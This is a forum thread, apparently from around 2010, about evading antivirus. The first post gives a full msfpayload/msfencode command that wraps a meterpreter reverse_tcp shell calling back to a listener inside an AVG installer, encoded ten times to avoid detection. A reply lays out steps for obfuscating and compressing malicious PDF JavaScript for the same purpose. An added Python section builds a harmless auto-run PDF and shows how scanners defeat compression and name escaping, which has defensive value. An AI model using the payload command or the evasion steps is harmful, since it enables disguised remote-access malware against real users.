Thread: msf encode av bypass works


  #1 Senior Member (joined Jan 2010, 173 posts)

    msf encode av bypass works

    Hi all,

    I just got a nice payload working that bypasses most AVs; according to VirusTotal only 3 picked it up.

    It works on Win 7, but it isn't really client-side, so I need to work out how to create a SET Adobe util like the one below manually, i.e. a PDF-to-exe type:

    #msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.75 LPORT=9090 R | msfencode -x avg_free_stb_all_9_114_cnet.exe -t exe -e x86/shikata_ga_nai -c 10 -o avg.exe

    Is there a way to encode a PDF Adobe util etc. with the same encoding (10x x86/shikata_ga_nai) like the SET payloads, or a way to specify this type using SET with 10x encoding?

  #2 lupin, Super Moderator (joined Jan 2010, 2,943 posts)

    Re: msf encode av bypass works

    There is a way to encode PDF files to bypass AV, yes, but you can't do it with msfencode, because that is used to encode shellcode (payloads, essentially), not entire exploits. Encoding of particular file types requires file-type-specific methods.

    I actually encoded a PDF file to bypass antivirus last week and was planning to write a blog entry about how, so I will post a link to that here when it's done.

    If you're impatient, here is the basic process, which can be used for PDF exploits that use JavaScript code to trigger the exploit (and that applies to the majority of current PDF sploits):
    1. Obtain the base JavaScript used to perform the exploit. This can be extracted from existing exploits if you know how.
    2. Obfuscate the JavaScript code for the exploit. Use your imagination here, and do a good job of it, because this is the step that will provide the maximum benefit in terms of AV avoidance. You need workable JavaScript knowledge for this.
    3. Use the make-pdf tools from Didier Stevens to create a PDF that auto-runs the script.
    4. Compress the PDF using pdftk.
    Last edited by lupin; 05-24-2010 at 11:52 PM.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.
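    The following Python is an added example, not code from this thread or from Didier Stevens' tools. It shows what steps 3 and 4 above look like at the byte level and why step 4 matters to a signature scanner. It writes a minimal PDF whose /OpenAction runs a script (the same basic layout make-pdf-javascript.py produces: a Catalog with an /OpenAction pointing at a /JavaScript action whose /JS is a stream), optionally with the script stream Flate-compressed, which is what pdftk's `compress` output option does to uncompressed streams, and optionally with #xx hex escapes in the action names. It then matches a small signature list against the raw file and against a normalised copy. The script body, the signature list and the object layout are constructed for this example; the file is a benign app.alert, not an exploit.

```python
"""Constructed example: how Flate-compressing a PDF's script stream hides
the script body from raw byte-signature matching, why it does not hide the
/JavaScript and /OpenAction names, and what a scanner has to undo
(inflate streams, decode #xx name escapes) before matching."""
import re
import zlib

# Benign constructed script standing in for the exploit JavaScript of steps 1-2.
SAMPLE_JS = b"app.alert('constructed sample, not an exploit');"


def _name(raw: bytes, escape: bool) -> bytes:
    """PDF names may hex-escape any character as #xx: /JavaS#63ript is the
    same name as /JavaScript to a conforming reader (0x63 == 'c')."""
    return raw.replace(b"c", b"#63") if escape else raw


def build_pdf(js: bytes, compress: bool = False, escape_names: bool = False) -> bytes:
    """Minimal single-page PDF whose /OpenAction runs `js` when the file opens.
    compress=True stores the script as a FlateDecode stream (as
    `pdftk in.pdf output out.pdf compress` would); escape_names=True applies
    #xx escapes to the /OpenAction and /JavaScript names."""
    if compress:
        data = zlib.compress(js)
        stream_dict = b"<< /Length %d /Filter /FlateDecode >>" % len(data)
    else:
        data = js
        stream_dict = b"<< /Length %d >>" % len(data)
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /" + _name(b"OpenAction", escape_names) + b" 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        b"<< /Type /Action /S /" + _name(b"JavaScript", escape_names) + b" /JS 5 0 R >>",
        stream_dict + b"\nstream\n" + data + b"\nendstream",
    ]
    out = bytearray(b"%PDF-1.4\n")
    offsets = []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))          # byte offset recorded in the xref table
        out += b"%d 0 obj\n%s\nendobj\n" % (num, body)
    xref_pos = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objects) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (
        len(objects) + 1, xref_pos)
    return bytes(out)


# Constructed signature list: two dictionary names and one script substring.
SIGNATURES = (b"/JavaScript", b"/OpenAction", b"app.alert")


def naive_scan(pdf: bytes, signatures=SIGNATURES) -> set:
    """What a plain byte-signature check sees: the raw file bytes only."""
    return {s for s in signatures if s in pdf}


_STREAM = re.compile(rb"<<([^<>]*)>>\s*stream\r?\n(.*?)\nendstream", re.S)
_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize(pdf: bytes) -> bytes:
    """Undo the two layers a scanner must see through before matching:
    inflate FlateDecode streams, then decode #xx name escapes. Handles the
    flat dictionaries this example writes; nested dictionaries and object
    streams (/Type /ObjStm) are out of scope here."""
    def inflate(m):
        dict_body, data = m.group(1), m.group(2)
        if b"/FlateDecode" in dict_body:
            try:
                data = zlib.decompress(data)
            except zlib.error:
                pass  # not zlib data (or deliberately corrupt): keep the raw bytes
        return b"<<%s>>\nstream\n%s\nendstream" % (dict_body, data)
    pdf = _STREAM.sub(inflate, pdf)   # inflate first, so escapes in binary data are untouched
    return _ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), pdf)


def scan(pdf: bytes, signatures=SIGNATURES) -> set:
    """Signature match after normalisation."""
    return naive_scan(normalize(pdf), signatures)


if __name__ == "__main__":
    plain = build_pdf(SAMPLE_JS)
    hidden = build_pdf(SAMPLE_JS, compress=True, escape_names=True)
    print("plain, naive :", sorted(naive_scan(plain)))
    print("hidden, naive:", sorted(naive_scan(hidden)))
    print("hidden, full :", sorted(scan(hidden)))
```

    Compression alone (step 4) removes the script text from the raw bytes, so a signature on the obfuscated JavaScript no longer fires, but the /JavaScript and /OpenAction names live in dictionaries, not streams, and stay visible until they are hex-escaped as well. A scanner that inflates streams and decodes name escapes, as pdfid/pdf-parser style tooling does, gets all three hits back, which is the caveat to keep in mind when judging a VirusTotal result for a file built this way.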

  #3 Senior Member (joined Jan 2010, 173 posts)

    Re: msf encode av bypass works

    Thanks lupin for the reply, I look forward to your blog post. It's been very hard to try pentests in the lab as my boxes all have ESET Smart Security and it does its job well, but I just managed to bypass it with the msfencode command I posted, on a Win 7 machine through NAT.

  #4 lupin, Super Moderator (joined Jan 2010, 2,943 posts)

    Re: msf encode av bypass works

    As mentioned earlier, I finally got around to writing a blog post about bypassing AV detection for malicious PDF files. It's here:

    The Grey Corner: Bypassing AntiVirus Detection for Malicious PDFs
